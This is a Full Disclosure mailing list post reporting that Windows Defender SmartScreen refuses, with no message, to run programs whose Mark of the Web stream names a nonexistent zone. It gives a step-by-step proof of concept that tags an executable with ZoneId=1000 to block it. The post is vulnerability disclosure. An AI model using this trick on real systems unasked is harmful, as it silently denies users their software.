Defense in depth -- The Microsoft way (part 74): Windows Defender SmartScreen is rather DUMP, it allows denial of service

["Stefan Kanthak" <stefan.kanthak () nexgo de>]

Hi @ll,

the following is a shortened version of
<https://skanthak.homepage.t-online.de/offender.html#case64021>

With Windows 8, Microsoft introduced Windows Defender SmartScreen as
replacement for the Attachment Manager introduced with Windows XP SP2
(the first release of Windows after they started Trustworthy Computing).

The Attachment Manager adds an Alternate Data Stream named Zone.Identifier
to files downloaded from the Internet or other computers, attachments
stored by mail clients etc. as so-called "Mark of the Web" to indicate
their (untrusted) origin.

With SmartScreen, the "Mark of the Web" allows to perform a denial of
service.

Demonstration:
~~~~~~~~~~~~~~

1. Compile and link the following minimal Win32 program:

--- dummy.c ---
#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

__declspec(noreturn)
VOID WINAPI wWinMainCRTStartup(VOID)
{
   ExitProcess(MessageBox(HWND_DESKTOP, L"Hello World!", L"Dummy", MB_OK));
}
--- EOF ---

   CL.exe /Zl /W4 /GAFy /c dummy.c
   LINK.exe /Link /Entry:wWinMainCRTStartup /NoDefaultLib /Release /SubSystem:Windows dummy.obj kernel32.lib user32.lib

2. Execute dummy.exe per double-click: it displays a message box titled
   "Dummy" with message text "Hello World!"

3. Add a "Mark of the Web" specifying the Internet zone to dummy.exe:
   execute NOTEPAD.exe dummy.exe:Zone.Identifier, answer the question
   whether you want to create a new file with [Yes], type the 2 lines
   between --- ... ---, close the editor and save the changes:

--- dummy.exe:Zone.Identifier ---
[ZoneTransfer]
ZoneId=3
--- EOF ---

4. Execute dummy.exe per double-click: Windows Defender SmartScreen
   displays a warning message titled "Windows protected your PC"
   with message text "Windows Defender SmartScreen prevented an
   unrecognized app from starting, Running this app might put your
   PC at risk. [...]"

   After clicking the button [Run anyway] the program executes and
   displays its message box.

5. Add a "Mark of the Web" specifying a custom zone to dummy.exe:
   execute NOTEPAD.exe dummy.exe:Zone.Identifier, answer the question
   whether you want to create a new file with [Yes], type the 2 lines
   between --- ... ---, close the editor and save the changes:

--- dummy.exe:Zone.Identifier ---
[ZoneTransfer]
ZoneId=1000
--- EOF ---

6. Exexute dummy.exe per double-click: NO REACTION!

The Common Weaknesses and Exposures classifies such misbehavior,
which here results in a denial of service, as
- CWE-20: Improper Input Validation
  <https://cwe.mitre.org/data/definitions/20.html>
- CWE-1284: Improper Validation of Specified Quantity in Input
  <https://cwe.mitre.org/data/definitions/1284.html>
- CWE-1286: Improper Validation of Syntactic Correctness of Input
  <https://cwe.mitre.org/data/definitions/1286.html>
- CWE-1287: Improper Validation of Specified Type of Input
  <https://cwe.mitre.org/data/definitions/1287.html>

The Common Attack Pattern Enumeration and Classification lists it as
- <https://capec.mitre.org/data/definitions/210.html>
  CAPEC-210: Abuse Existing Functionality

stay tuned, and far away from such disfunctional crap
Stefan Kanthak

JFTR: before/without SmartScreen, the Attachment Manager discards
      a "Mark of the Web" with unsupported zones, i.e. ZoneId > 4

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/